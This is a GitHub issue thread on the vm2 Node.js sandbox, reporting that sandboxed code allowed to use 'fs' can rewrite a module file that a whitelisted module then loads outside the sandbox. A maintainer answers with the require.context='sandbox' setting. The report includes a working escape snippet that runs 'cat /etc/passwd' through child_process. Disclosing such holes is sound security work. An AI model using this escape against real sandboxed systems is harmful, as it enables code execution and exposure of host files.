### ISSUE TITLE
Bypass Require Restrictions Using the File System

### ISSUE THREAD

**Issue by cristianstaicu** [patriksimek/vm2#284]
Hey, 

I was wondering if there is any way to protect against attacks that involve changing the files on the disk. For example let us assume we have a file "foo":

```js
module.exports = function() {
    let bar = require("./bar");
    return bar();
}
```

that invokes a method in "bar":

```js
module.exports = function() {
    return 23;
}
```

Now, let us assume we want to run arbitrary, possibly attacker-controlled, code using vm2 and only allow access to the builtin "fs" module and the "foo" file. We would do something like this: 

```js
const {NodeVM} = require('vm2'); 
nvmfs = new NodeVM({require: {    
        builtin: ['fs'],
        root: "./",
        external: ["foo"]       
}});

nvmfs.run(maliciousCode, __filename);
```

The attacker can provide the following code, however, that would run outside of the sandbox: 

```js
const fs = require("fs")
    fs.writeFileSync("./bar.js" ,"module.exports = function() {return require('child_process').execSync('cat /etc/passwd').toString();}");
    const foo = require("./foo");
```

Is there a way to force the required code to run in the sandbox as well? Thanks in advance!

**Comment by XmiliaH** [comment]
Have a look at `require.context="sandbox"`.
However, unrestricted access to fs is not adviced, since there are more files that could be overwritten.

**Comment by cristianstaicu** [comment]
Great, thanks a lot! I did not notice that option. Is there a reason why it is default to "host" and not "sandbox" (other than usability :smiley:)? Feel free to close this issue. However, maybe the documentation of the module should include a warning about this.
